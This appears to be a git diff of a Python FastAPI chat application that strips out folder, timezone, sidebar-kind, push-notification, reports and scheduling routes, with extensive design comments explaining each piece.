||||
"type": "image/png", "purpose": "any"},
|
||||
{"src": f"/branding/{icons['maskable']}", "sizes": "512x512",
|
||||
"type": "image/png", "purpose": "maskable"},
|
||||
] if icons.get("icon-192") and icons.get("icon-512") and icons.get("maskable") else [
|
||||
{"src": "/static/img/icon-192.png", "sizes": "192x192",
|
||||
"type": "image/png", "purpose": "any"},
|
||||
{"src": "/static/img/icon-512.png", "sizes": "512x512",
|
||||
@@ -617,52 +232,22 @@ async def offline(request: Request) -> Response:
|
||||
|
||||
@router.get("/chat")
|
||||
async def chat_index(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
model: str = "",
|
||||
temporary: bool = False,
|
||||
kind: str = "",
|
||||
folder: str = "",
|
||||
request: Request, db: Db, user: RequiredUser, model: str = "", temporary: bool = False
|
||||
):
|
||||
"""A composer with no chat behind it yet.
|
||||
|
||||
`?model=` preselects one, which is how the pinned shortcuts work without
|
||||
creating a row for a chat that may never be sent. `?temporary=1` is the
|
||||
same idea for the temporary flag: it lives in the URL rather than in
|
||||
JavaScript, so it survives a reload and can be bookmarked. `?kind=agent`
|
||||
is how the sidebar's Agent side opens a new chat already on that side --
|
||||
a preselection like the other two, not a decision: the kind is still
|
||||
chosen on the screen and still fixed only when the first message is sent.
|
||||
`?folder=` is the same again, and is what "New chat here" on a folder row
|
||||
posts: the chat is filed there, and `_new_chat` fills in whatever the
|
||||
folder seeds and the screen left empty.
|
||||
JavaScript, so it survives a reload and can be bookmarked.
|
||||
"""
|
||||
context = _chat_context(db, user, None)
|
||||
|
||||
# Somebody else's folder id in the URL is ignored rather than refused. It
|
||||
# would only ever get there by hand, and an error page holding a composer
|
||||
# hostage over a bad query string helps nobody.
|
||||
starting_folder = db.get(Folder, folder) if folder else None
|
||||
if starting_folder is not None and starting_folder.user_id != user.id:
|
||||
starting_folder = None
|
||||
# A folder that fixes the kind picks the fork, unless the URL already said.
|
||||
if not kind and starting_folder is not None:
|
||||
kind = starting_folder.kind
|
||||
|
||||
# Fall back to the same choice a new chat would make -- the user's default,
|
||||
# then the instance default, then first in order. Using models[0] here
|
||||
# instead would show a model the chat is not going to use, which matters:
|
||||
# the composer decides from it whether to warn that images will be dropped.
|
||||
preselected = next((m for m in context["models"] if m.model_id == model), None)
|
||||
# The folder's own model, ahead of the reader's default and behind an
|
||||
# explicit `?model=`. Same order `_new_chat` applies, so the picker shows
|
||||
# the model the chat is actually going to be created with -- which matters,
|
||||
# because the composer decides from it whether to warn about images.
|
||||
if preselected is None and starting_folder is not None and starting_folder.model_id:
|
||||
preselected = next(
|
||||
(m for m in context["models"] if m.model_id == starting_folder.model_id), None
|
||||
)
|
||||
if preselected is None:
|
||||
chosen = chat_service.default_model(db, user)
|
||||
if chosen is not None:
|
||||
@@ -682,56 +267,12 @@ async def chat_index(
|
||||
**context,
|
||||
"current_model": preselected,
|
||||
"starting_temporary": temporary,
|
||||
"starting_kind": kind if kind in KINDS else KIND_CHAT,
|
||||
"starting_folder": starting_folder,
|
||||
"suggestions": suggestions_service.visible(db),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _candidate_parents(db: DBSession, user_id: str, folder: Folder) -> list[Folder]:
|
||||
from lembas.api.folders import candidate_parents
|
||||
|
||||
return candidate_parents(db, user_id, folder)
|
||||
|
||||
|
||||
@router.get("/folders/{folder_id}")
|
||||
async def folder_settings(request: Request, db: Db, user: RequiredUser, folder_id: str):
|
||||
"""What a folder hands to the chats started inside it.
|
||||
|
||||
A page rather than a row that expands, following the admin convention: a
|
||||
form per row in a tree that nests eight deep would be unusable, and the
|
||||
sidebar is the one part of the application that has to stay scannable.
|
||||
|
||||
Guarded by `folder.manage`, the same permission the whole folder router
|
||||
carries -- editing a folder's system prompt is managing a folder, and a page
|
||||
that renders for somebody whose save is going to 403 is a trap.
|
||||
"""
|
||||
if not permissions.has(db, user, "folder.manage"):
|
||||
raise HTTPException(status.HTTP_403_FORBIDDEN, "You cannot manage folders.")
|
||||
|
||||
folder = db.get(Folder, folder_id)
|
||||
if folder is None or folder.user_id != user.id:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That folder no longer exists.")
|
||||
|
||||
return render(
|
||||
request,
|
||||
"folders/edit.html",
|
||||
{
|
||||
"folder": folder,
|
||||
"chat": None,
|
||||
# Imported here rather than at module scope: `api.folders` imports
|
||||
# `api.deps`, which this module is a peer of, and the pair have been
|
||||
# kept apart deliberately.
|
||||
"parents": _candidate_parents(db, user.id, folder),
|
||||
"models": chat_service.available_models(db, user),
|
||||
**_agent_context(db, user, None),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/chat/{chat_id}")
|
||||
async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str):
|
||||
chat = db.get(Chat, chat_id)
|
||||
@@ -753,29 +294,23 @@ async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str
|
||||
# have only stopped being part of the request.
|
||||
compacted, messages = compaction_service.split(db, chat, everything)
|
||||
|
||||
# Empty, and kept only so `_thread.html` and the four handlers that render a
|
||||
# bubble keep one signature between them. An assistant turn is rendered from
|
||||
# its steps now (`message_steps`, a Jinja global), which is what lets a
|
||||
# reply's prose sit either side of the tool call it surrounded rather than
|
||||
# arriving as one block at the bottom. Nothing reads this for an assistant
|
||||
# message any more; `library/note_detail.html` has its own.
|
||||
bodies: dict[str, str] = {}
|
||||
# Markdown is rendered once here rather than in the template so the same
|
||||
# helper produces the page and the streamed final frame -- one code path,
|
||||
# no chance of the two disagreeing.
|
||||
bodies = {
|
||||
message.id: render_markdown(message.content)
|
||||
for message in everything
|
||||
if message.role == "assistant" and message.content
|
||||
}
|
||||
|
||||
# What the chat would use if its own prompt were empty, so the settings
|
||||
# panel can show it as placeholder text rather than leaving the user to
|
||||
# guess what "inherited" means.
|
||||
#
|
||||
# This mirrors `chat_service.effective_system_prompt` and has to keep
|
||||
# mirroring it, layer for layer and in the same order -- a panel naming the
|
||||
# wrong source is worse than one naming none, because it is believed.
|
||||
inherited, inherited_from = "", ""
|
||||
folder_prompt = chat_service.folder_system_prompt(db, chat)
|
||||
current = next(
|
||||
(m for m in chat_service.available_models(db, user) if m.model_id == chat.model_id), None
|
||||
)
|
||||
if folder_prompt:
|
||||
inherited, inherited_from = folder_prompt, "folder"
|
||||
elif current is not None and (current.system_prompt or "").strip():
|
||||
if current is not None and (current.system_prompt or "").strip():
|
||||
inherited, inherited_from = current.system_prompt.strip(), "model"
|
||||
else:
|
||||
instance_prompt = (settings_store.get(db, "system_prompt") or "").strip()
|
||||
@@ -792,45 +327,12 @@ async def chat_detail(request: Request, db: Db, user: RequiredUser, chat_id: str
|
||||
"bodies": bodies,
|
||||
"inherited_prompt": inherited,
|
||||
"inherited_from": inherited_from,
|
||||
**_schedule_context(db, user, chat),
|
||||
**_chat_context(db, user, chat),
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
def _schedule_context(db: DBSession, user: User, chat: Chat) -> dict:
|
||||
"""What the strip below a task chat needs.
|
||||
|
||||
Empty for every other kind, so the three keys exist unconditionally and the
|
||||
template can ask about `schedule` without a `default(false)` -- the same
|
||||
reason `audio_service.template_flags` is passed by all four bubble
|
||||
renderers rather than by whichever one remembered.
|
||||
|
||||
`schedule` being None on a task chat is a real state, not an error: removing
|
||||
a schedule keeps its chat by default, and the strip says so.
|
||||
"""
|
||||
from lembas.services import schedules as schedules_service
|
||||
|
||||
if chat is None or chat.kind != KIND_TASK:
|
||||
return {"schedule": None, "schedule_summary": "", "schedule_next": None}
|
||||
|
||||
schedule = schedules_service.for_chat(db, chat)
|
||||
if schedule is None:
|
||||
return {"schedule": None, "schedule_summary": "", "schedule_next": None}
|
||||
|
||||
zone = clock.zone_for(user)
|
||||
return {
|
||||
"schedule": schedule,
|
||||
"schedule_summary": schedules_service.describe(schedule, owner=user),
|
||||
"schedule_next": (
|
||||
clock.as_utc(schedule.next_fire_at).astimezone(zone)
|
||||
if schedule.next_fire_at
|
||||
else None
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@router.get("/settings")
|
||||
async def settings_page(
|
||||
request: Request,
|
||||
@@ -840,7 +342,6 @@ async def settings_page(
|
||||
saved: str = "",
|
||||
):
|
||||
from lembas.api.audio import available_voices
|
||||
from lembas.services import personas as personas_service
|
||||
from lembas.services.library import memories as memories_service
|
||||
|
||||
context = _chat_context(db, user, None)
|
||||
@@ -861,19 +362,6 @@ async def settings_page(
|
||||
"voice_error": voice_error,
|
||||
"memories": memories_service.all_for(db, user),
|
||||
"memory_limit": memories_service.MAX_MEMORY_CHARS,
|
||||
# What each model has made of this person, in its own words. Shown
|
||||
# here because that is the whole reason a model is allowed to keep
|
||||
# one: a note about somebody they cannot read is not something this
|
||||
# application should hold. Labelled by model id, which is what the
|
||||
# row is keyed on -- a model that has since been removed still had an
|
||||
# opinion, and hiding the row would leave no way to delete it.
|
||||
"reflections": personas_service.reflections_for(db, user),
|
||||
# Sorted rather than left in set order, because a list of six
|
||||
# hundred zones that is not alphabetical is one nobody can use.
|
||||
"timezones": sorted(available_timezones()),
|
||||
"timezone": clock.name_for(user),
|
||||
"server_timezone": str(clock.server_zone()),
|
||||
"local_now": clock.now_for(user).strftime("%H:%M on %A %-d %B"),
|
||||
**context,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
|
||||
@@ -12,20 +12,12 @@ from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.config import settings
|
||||
from lembas.security.passwords import hash_password, validate_password, verify_password
|
||||
from lembas.security.sessions import COOKIE_NAME, create_session, revoke_all_for_user
|
||||
from lembas.services.schedule import clock
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/api/preferences", tags=["preferences"])
|
||||
|
||||
# The built-in pair used to be spelled out here, and in four other places. It is
|
||||
# one server-resolved list now, because an administrator can define a theme and a
|
||||
# hard-coded pair would refuse it -- silently, since this route answers a
|
||||
# rejection with `{"ok": false}` that nothing displays.
|
||||
def themes() -> tuple[str, ...]:
|
||||
from lembas.services import branding
|
||||
|
||||
return branding.snapshot().theme_ids
|
||||
THEMES = ("moria", "shire")
|
||||
|
||||
|
||||
@router.post("/theme")
|
||||
@@ -36,7 +28,7 @@ async def set_theme(db: Db, user: RequiredUser, theme: str = Body(..., embed=Tru
|
||||
the choice follow the user to another browser, and what lets the server
|
||||
render the right theme on first paint instead of flashing the default.
|
||||
"""
|
||||
if theme not in themes():
|
||||
if theme not in THEMES:
|
||||
return {"ok": False, "detail": "Unknown theme."}
|
||||
|
||||
# Replaced rather than mutated in place: SQLAlchemy only reliably detects
|
||||
@@ -46,33 +38,12 @@ async def set_theme(db: Db, user: RequiredUser, theme: str = Body(..., embed=Tru
|
||||
return {"ok": True, "theme": theme}
|
||||
|
||||
|
||||
@router.post("/timezone")
|
||||
async def set_timezone(db: Db, user: RequiredUser, timezone: str = Form("")) -> Response:
|
||||
"""Which zone this person's schedules fire in, and what time they are told it is.
|
||||
|
||||
Empty is a real answer -- "whatever the server is set to" -- rather than an
|
||||
unset field, which is why it is stored as "" instead of being removed. An
|
||||
unrecognised name is refused rather than stored and fallen back from later:
|
||||
a schedule that quietly fires in the wrong zone is the failure this whole
|
||||
field exists to prevent, and the one place to catch it is the write.
|
||||
"""
|
||||
chosen = (timezone or "").strip()
|
||||
if chosen and not clock.known(chosen):
|
||||
return RedirectResponse(
|
||||
"/settings?error=timezone", status_code=status.HTTP_303_SEE_OTHER
|
||||
)
|
||||
user.settings_json = {**(user.settings_json or {}), clock.SETTING_KEY: chosen}
|
||||
db.commit()
|
||||
return RedirectResponse("/settings?saved=timezone", status_code=status.HTTP_303_SEE_OTHER)
|
||||
|
||||
|
||||
# Which CSS variables a browser is allowed to set from here, and how far. An
|
||||
# open dict would let a page store anything under somebody's account and have
|
||||
# it read back on every load; a width outside these bounds would hand them a
|
||||
# panel they cannot see to drag back.
|
||||
LAYOUT_BOUNDS = {
|
||||
"--terminal-width": (384, 2400),
|
||||
"--canvas-width": (384, 2400),
|
||||
"--inspector-width": (280, 2400),
|
||||
"--sidebar-width": (200, 800),
|
||||
}
|
||||
@@ -105,44 +76,6 @@ async def set_layout(db: Db, user: RequiredUser, widths: dict = Body(...)) -> di
|
||||
return {"ok": True, "layout": kept}
|
||||
|
||||
|
||||
@router.post("/sidebar-kind")
|
||||
async def set_sidebar_kind(
|
||||
request: Request, db: Db, user: RequiredUser, kind: str = Form("")
|
||||
) -> Response:
|
||||
"""Switch the sidebar between ordinary chats and agent chats.
|
||||
|
||||
Saves and re-renders in one round trip, because the two cannot be allowed to
|
||||
disagree: a switch that stored a choice and left the tree showing the other
|
||||
side would look broken, and re-rendering without storing would lose it on the
|
||||
next navigation. The tree comes back as a fragment rather than an `HX-Refresh`
|
||||
-- a full reload is what `api/folders.py` does for a structural change, and it
|
||||
would throw away the folder open/closed state on every flick of the switch,
|
||||
which is the same thing `/api/chats/unread` avoids by swapping out of band.
|
||||
|
||||
An unrecognised value is refused rather than stored: `sidebar_kind` reads it
|
||||
back as "chat" anyway, so storing it would be a preference that silently
|
||||
does nothing.
|
||||
"""
|
||||
from lembas.api.pages import sidebar_context
|
||||
from lembas.db.models import KINDS
|
||||
from lembas.web.templating import templates
|
||||
|
||||
if kind not in KINDS:
|
||||
return Response(status_code=status.HTTP_400_BAD_REQUEST)
|
||||
|
||||
user.settings_json = {**(user.settings_json or {}), "sidebar_kind": kind}
|
||||
db.commit()
|
||||
|
||||
return templates.TemplateResponse(
|
||||
request,
|
||||
"partials/_sidebar_tree.html",
|
||||
# `oob` brings the New chat button along out of band. It sits above the
|
||||
# scroll area rather than inside the tree, so a swap of the tree alone
|
||||
# left it saying "New chat" while agent chats were listed underneath.
|
||||
{"chat": None, "user": user, "oob": True, **sidebar_context(db, user)},
|
||||
)
|
||||
|
||||
|
||||
@router.post("/default-model")
|
||||
async def set_default_model(
|
||||
db: Db, user: RequiredUser, model_id: str = Form("")
|
||||
|
||||
@@ -1,123 +0,0 @@
|
||||
"""Registering a browser for notifications, and letting it go again.
|
||||
|
||||
Three routes and no cleverness. The interesting half is `services/push.py`;
|
||||
this is the part a browser talks to.
|
||||
|
||||
Ownership is the whole authorisation, as everywhere a person's own things are
|
||||
handled here: a subscription belongs to whoever was signed in when it was made,
|
||||
and nothing else can reach it.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Request, Response, status
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser
|
||||
from lembas.db.models import PushSubscription
|
||||
from lembas.services import fetch as fetch_service
|
||||
from lembas.services import push as push_service
|
||||
from lembas.services.fetch import FetchError
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(prefix="/api/push", tags=["push"])
|
||||
|
||||
# What a browser hands back is its own; these are the bounds that stop a crafted
|
||||
# POST writing a novel into the row.
|
||||
MAX_ENDPOINT = 2000
|
||||
MAX_KEY = 255
|
||||
|
||||
|
||||
@router.get("/key")
|
||||
async def application_key(db: Db, user: RequiredUser) -> dict[str, str]:
|
||||
"""The public half of this instance's VAPID key.
|
||||
|
||||
A browser needs it to subscribe, and it is public by construction — it is
|
||||
what every push service is shown on every send. Behind a login anyway,
|
||||
because there is no reason for it to be readable by anyone who is not about
|
||||
to use it.
|
||||
"""
|
||||
return {"key": push_service.public_key(db)}
|
||||
|
||||
|
||||
@router.post("/subscribe")
|
||||
async def subscribe(request: Request, db: Db, user: RequiredUser) -> Response:
|
||||
"""Store what `pushManager.subscribe` handed back.
|
||||
|
||||
Idempotent on the endpoint, because a browser that re-subscribes returns the
|
||||
same one — and two rows for one browser would be two notifications for one
|
||||
arrival. Re-subscribing also **re-points it at whoever is signed in now**:
|
||||
the endpoint belongs to the browser, so on a shared machine the second
|
||||
person to turn notifications on must get them instead of the first, not as
|
||||
well.
|
||||
"""
|
||||
payload = await request.json()
|
||||
endpoint = str(payload.get("endpoint") or "").strip()[:MAX_ENDPOINT]
|
||||
keys = payload.get("keys") or {}
|
||||
p256dh = str(keys.get("p256dh") or "").strip()[:MAX_KEY]
|
||||
auth = str(keys.get("auth") or "").strip()[:MAX_KEY]
|
||||
|
||||
if not endpoint.startswith("https://") or not p256dh or not auth:
|
||||
return Response(status_code=status.HTTP_400_BAD_REQUEST)
|
||||
|
||||
# The endpoint is a URL the browser hands us and the server later POSTs to,
|
||||
# which makes it the same shape as every other URL a request can name --
|
||||
# and it was the one outbound client in the codebase not going through the
|
||||
# SSRF guard. `https://` alone says nothing about *where*: an internal
|
||||
# address is as valid a URL as Mozilla's push service, and the caller
|
||||
# triggers delivery themselves by sending a message and closing the tab.
|
||||
#
|
||||
# Checked here **and** again before the POST, the split `agent/hosts.py`
|
||||
# uses: a row can predate a DNS change, and this one is stored.
|
||||
try:
|
||||
fetch_service.check_url(endpoint)
|
||||
except FetchError as exc:
|
||||
log.warning("refused a push endpoint from %s: %s", user.email, exc.message)
|
||||
return Response(status_code=status.HTTP_400_BAD_REQUEST)
|
||||
|
||||
existing = db.scalars(
|
||||
select(PushSubscription).where(PushSubscription.endpoint == endpoint)
|
||||
).first()
|
||||
if existing is not None:
|
||||
existing.user_id = user.id
|
||||
existing.p256dh = p256dh
|
||||
existing.auth_secret = auth
|
||||
existing.last_error = ""
|
||||
else:
|
||||
db.add(
|
||||
PushSubscription(
|
||||
user_id=user.id,
|
||||
endpoint=endpoint,
|
||||
p256dh=p256dh,
|
||||
auth_secret=auth,
|
||||
label=str(request.headers.get("user-agent") or "")[:200],
|
||||
)
|
||||
)
|
||||
db.commit()
|
||||
log.info("%s registered a browser for notifications", user.email)
|
||||
return Response(status_code=status.HTTP_204_NO_CONTENT)
|
||||
|
||||
|
||||
@router.post("/unsubscribe")
|
||||
async def unsubscribe(request: Request, db: Db, user: RequiredUser) -> Response:
|
||||
"""Forget one browser.
|
||||
|
||||
Answers 204 whether or not there was anything to delete: the browser has
|
||||
already dropped its own subscription by the time it calls this, and telling
|
||||
it that the row was missing gives it nothing it could do about it.
|
||||
"""
|
||||
payload = await request.json()
|
||||
endpoint = str(payload.get("endpoint") or "").strip()
|
||||
|
||||
row = db.scalars(
|
||||
select(PushSubscription).where(
|
||||
PushSubscription.endpoint == endpoint, PushSubscription.user_id == user.id
|
||||
)
|
||||
).first()
|
||||
if row is not None:
|
||||
db.delete(row)
|
||||
db.commit()
|
||||
return Response(status_code=status.HTTP_204_NO_CONTENT)
|
||||
@@ -1,122 +0,0 @@
|
||||
"""Reports: a feed of finished work, and one report on its own page.
|
||||
|
||||
List-plus-detail, the same shape as the library — and for the same reason, since
|
||||
an instance running a daily schedule accumulates reports faster than anything
|
||||
else here.
|
||||
|
||||
**There is no composer on either page, and no route below accepts a message.**
|
||||
That is the whole character of the section rather than an omission: a report is
|
||||
addressed to the reader and cannot be answered, and the way to be sure of that
|
||||
is for the machinery that would answer to be absent. Nothing here renders
|
||||
`chat/_message.html`, so there is no `sse-connect` anywhere on these pages and
|
||||
nothing on them can start a generation.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
|
||||
from fastapi import APIRouter, Depends, HTTPException, Request, status
|
||||
from fastapi.responses import RedirectResponse, Response
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.api.library import PAGE_SIZE, _page
|
||||
from lembas.api.pages import sidebar_context
|
||||
from lembas.db.models import Report
|
||||
from lembas.security import permissions
|
||||
from lembas.services import reports as reports_service
|
||||
from lembas.services import sharing
|
||||
from lembas.services.library import retrieval
|
||||
from lembas.services.markdown import render_markdown
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(dependencies=[Depends(require_permission("reports.use"))], tags=["reports"])
|
||||
|
||||
|
||||
@router.get("/reports")
|
||||
async def reports_list(
|
||||
request: Request,
|
||||
db: Db,
|
||||
user: RequiredUser,
|
||||
q: str = "",
|
||||
page: int = 1,
|
||||
shared: bool = False,
|
||||
):
|
||||
"""`shared=1` narrows to reports other people have shared with this reader.
|
||||
|
||||
Reports became shareable at the same time as this filter appeared, and the
|
||||
two arrived together on purpose: a feed that quietly grew somebody else's
|
||||
work with no way to see only theirs is worse than one that never grew.
|
||||
"""
|
||||
if q.strip():
|
||||
rows = reports_service.search(
|
||||
db, user, q, limit=PAGE_SIZE, vector=await retrieval.embed_query(db, q)
|
||||
)
|
||||
pager = {"page": 1, "pages": 1, "total": len(rows)}
|
||||
else:
|
||||
rows, pager = _page(
|
||||
db,
|
||||
(
|
||||
select(Report).where(sharing.only_shared(Report, user))
|
||||
if shared
|
||||
else reports_service.visible(user)
|
||||
).order_by(Report.created_at.desc()),
|
||||
page,
|
||||
)
|
||||
return render(
|
||||
request,
|
||||
"reports/index.html",
|
||||
{
|
||||
"section": "reports",
|
||||
"reports": rows,
|
||||
"q": q,
|
||||
"shared": shared,
|
||||
"pager": pager,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.get("/reports/{report_id}")
|
||||
async def report_detail(request: Request, db: Db, user: RequiredUser, report_id: str):
|
||||
report = reports_service.get(db, report_id, user)
|
||||
if report is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That report is not available.")
|
||||
# Opening one is what reading it means. Done before rendering so the dot on
|
||||
# the way in and the dot on the way back to the list agree -- the poller
|
||||
# would otherwise re-announce a report the reader is looking at.
|
||||
#
|
||||
# Only the owner's own reading counts. `unread` is the owner's dot, and
|
||||
# somebody a report was shared with opening it would otherwise clear a
|
||||
# notification meant for a person who has not seen it.
|
||||
if report.owner_id == user.id:
|
||||
reports_service.mark_read(db, report)
|
||||
return render(
|
||||
request,
|
||||
"reports/detail.html",
|
||||
{
|
||||
"section": "reports",
|
||||
"report": report,
|
||||
# Model output, through the one path allowed to emit HTML.
|
||||
"body_html": render_markdown(report.body),
|
||||
"can_share": permissions.has(db, user, "library.share"),
|
||||
"is_owner": report.owner_id == user.id,
|
||||
"share_kind": "report",
|
||||
"share_id": report.id,
|
||||
**sidebar_context(db, user),
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
@router.post("/api/reports/{report_id}/delete")
|
||||
async def delete_report(db: Db, user: RequiredUser, report_id: str) -> Response:
|
||||
# `owned`, not `get`: sharing grants reading, so being able to see a report
|
||||
# is not being able to delete it out from under the person who filed it.
|
||||
report = reports_service.owned(db, report_id, user)
|
||||
if report is None:
|
||||
raise HTTPException(status.HTTP_404_NOT_FOUND, "That report is not available.")
|
||||
reports_service.delete(db, report)
|
||||
return RedirectResponse("/reports", status_code=status.HTTP_303_SEE_OTHER)
|
||||
@@ -1,368 +0,0 @@
|
||||
"""Scheduled: the list, the setup form, and one task chat's controls.
|
||||
|
||||
A schedule's own chat is rendered by the ordinary chat page — same transcript,
|
||||
same tail poller, same canvas — with the composer replaced by a strip of
|
||||
controls. That is the whole reason `KIND_TASK` reuses `Chat` and `Message`
|
||||
rather than growing tables of its own.
|
||||
|
||||
The rule form here is the **manual** one, and it is not a fallback in the
|
||||
apologetic sense: it is what makes "an empty override means off" safe for the
|
||||
compile step in Phase 3. Clearing `task.schedule_compile` must switch off the
|
||||
*compiling*, not the feature.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from fastapi import APIRouter, Depends, Form, HTTPException, Request, status
|
||||
from fastapi.responses import RedirectResponse, Response
|
||||
|
||||
from lembas.api.deps import Db, RequiredUser, require_permission
|
||||
from lembas.api.pages import sidebar_context
|
||||
from lembas.db.models import TARGET_CHAT, TARGET_MESSAGES, TARGET_REPORT, Schedule
|
||||
from lembas.services import chat as chat_service
|
||||
from lembas.services import schedules as schedules_service
|
||||
from lembas.services.schedule import clock, runner
|
||||
from lembas.services.schedule import rule as rule_service
|
||||
from lembas.web.templating import render
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
router = APIRouter(
|
||||
dependencies=[Depends(require_permission("schedule.use"))], tags=["schedules"]
|
||||
)
|
||||
|
||||
# What the setup form may ask for, in the order they are offered.
|
||||
OFFERED_TARGETS = (
|
||||
(TARGET_CHAT, "Its own chat"),
|
||||
(TARGET_REPORT, "Reports"),
|
||||
(TARGET_MESSAGES, "Messages"),
|
||||
)
|
||||
|
||||
REPEAT_ONCE = "once"
|
||||
REPEAT_EVERY = "every"
|
||||
REPEAT_CALENDAR = "calendar"
|
||||
|
||||
|
||||
def _rule_from_form(form) -> dict:
|
||||
"""Build a rule dict out of the setup form's fields.
|
||||
|
||||
Deliberately builds the *raw* shape and hands it to `rule.validate` rather
|
||||
than validating here: there is one normaliser, it is total, and it is the
|
||||
same one a model's compiled output will go through in Phase 3. Two
|
||||
validators would be two ideas of what a legal schedule is.
|
||||
"""
|
||||
repeat = str(form.get("repeat") or REPEAT_ONCE)
|
||||
raw: dict = {}
|
||||
|
||||
when = str(form.get("start_date") or "").strip()
|
||||
at_time = str(form.get("start_time") or "").strip() or "09:00"
|
||||
if when:
|
||||
raw["start"] = f"{when}T{at_time}:00"
|
||||
|
||||
if repeat == REPEAT_EVERY:
|
||||
unit = str(form.get("every_unit") or "hours")
|
||||
try:
|
||||
amount = int(form.get("every_amount") or 1)
|
||||
except (TypeError, ValueError):
|
||||
amount = 1
|
||||
raw["every"] = {unit: amount}
|
||||
# A timer with no start begins now. Said here rather than in the rule
|
||||
# module, which has no clock by design.
|
||||
raw.setdefault("start", datetime.now(tz=UTC).isoformat())
|
||||
|
||||
elif repeat == REPEAT_CALENDAR:
|
||||
times = [t.strip() for t in str(form.get("times") or "09:00").split(",") if t.strip()]
|
||||
raw["at"] = {
|
||||
"weekdays": [int(d) for d in form.getlist("weekdays") if str(d).isdigit()],
|
||||
"times": times,
|
||||
}
|
||||
days = str(form.get("month_days") or "").strip()
|
||||
if days:
|
||||
raw["at"]["days"] = [int(d) for d in days.split(",") if d.strip().isdigit()]
|
||||
|
||||
try:
|
||||
count = int(form.get("count") or 0)
|
||||
except (TypeError, ValueError):
|
||||
count = 0
|
||||
if count > 0:
|
||||
raw["count"] = count
|
||||
|
||||
until = str(form.get("until") or "").strip()
|
||||
if until:
|
||||
raw["until"] = f"{until}T23:59:00"
|
||||
|
||||
return raw
|
||||
|
||||
|
||||
def _form_values(
|
||||
*, schedule: Schedule | None = None, compiled=None
|
||||
) -> dict:
|
||||
"""Everything `schedules/_form.html` renders, from whichever source there is.
|
||||
|
||||
One dict for both pages, because they are the same fields: an existing row
|
||||
on the edit page, and what the compile proposed on the new one. The form
|
||||
reads only this, so what a model suggested is displayed through exactly the
|
||||
same path as what is stored -- there is no branch in the template that could
|
||||
show one of them differently.
|
||||
"""
|
||||
if compiled is not None:
|
||||
values = _rule_defaults_from(compiled.rule)
|
||||
values.update(
|
||||
title=compiled.title, instruction=compiled.instruction, target=compiled.target
|
||||
)
|
||||
return values
|
||||
values = _rule_defaults_from((schedule.rule_json if schedule else {}) or {})
|
||||
values.update(
|
||||
title=schedule.title if schedule else "",
|
||||
instruction=schedule.instruction if schedule else "",
|
||||
target=schedule.target if schedule else TARGET_CHAT,
|
||||
)
|
||||
return values
|
||||
|
||||
|
||||
def _rule_defaults_from(rule: dict) -> dict:
|
||||
"""What the form should show for a rule.
|
||||
|
||||
Derived from the *normalised* rule, so the form and the engine cannot
|
||||
disagree about what is stored -- an edit screen showing something other
|
||||
than what runs is the same failure as a label that names the wrong tool.
|
||||
Shared by the edit page and by the compile's review step, so what a model
|
||||
proposed is displayed through exactly the same path as what is saved.
|
||||
"""
|
||||
rule = rule or {}
|
||||
at = rule.get("at") or {}
|
||||
every = rule.get("every") or {}
|
||||
if at:
|
||||
repeat = REPEAT_CALENDAR
|
||||
elif every:
|
||||
repeat = REPEAT_EVERY
|
||||
else:
|
||||
repeat = REPEAT_ONCE
|
||||
minutes = int(every.get("minutes") or 0)
|
||||
unit, amount = "minutes", minutes
|
||||
for size, name in ((10080, "weeks"), (1440, "days"), (60, "hours")):
|
||||
if minutes and not minutes % size:
|
||||
unit, amount = name, minutes // size
|
||||
break
|
||||
return {
|
||||
"repeat": repeat,
|
||||
"every_unit": unit,
|
||||
"every_amount": amount or 1,
|
||||
"weekdays": at.get("weekdays") or [],
|
||||
"times": ", ".join(at.get("times") or []),
|
||||
"month_days": ", ".join(str(d) for d in at.get("days") or []),
|
||||
"count": rule.get("count") or 0,
|
||||
}
|
||||
|
||||
|
||||
def _context(db, user, schedule: Schedule | None, *, error: str = "") -> dict:
|
||||
return {
|
||||
"section": "scheduled",
|
||||
"schedule": schedule,
|
||||
"targets": OFFERED_TARGETS,
|
||||
"weekday_names": list(
|
||||
enumerate(("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"))
|
||||
),
|
||||
"form": _form_values(schedule=schedule),
|
||||
"error": error,
|
||||
"models": chat_service.available_models(db, user),
|
||||
"timezone": clock.name_for(user) or str(clock.server_zone()),
|
||||
**sidebar_context(db, user),
|
||||
}
|
||||
|
||||
|
||||
# --- The list ------------------------------------------------------------------
|
||||
@router.get("/scheduled")
|
||||
async def scheduled_list(request: Request, db: Db, user: RequiredUser):
|
||||
rows = list(
|
||||
db.scalars(schedules_service.visible(user).order_by(Schedule.created_at.desc()))
|
||||
)
|
||||
zone = clock.zone_for(user)
|
||||
return render(
|
||||
request,
|
||||
"schedules/index.html",
|
||||
{
|
||||
"section": "scheduled",
|
||||
"schedules": [
|
||||
{
|
||||
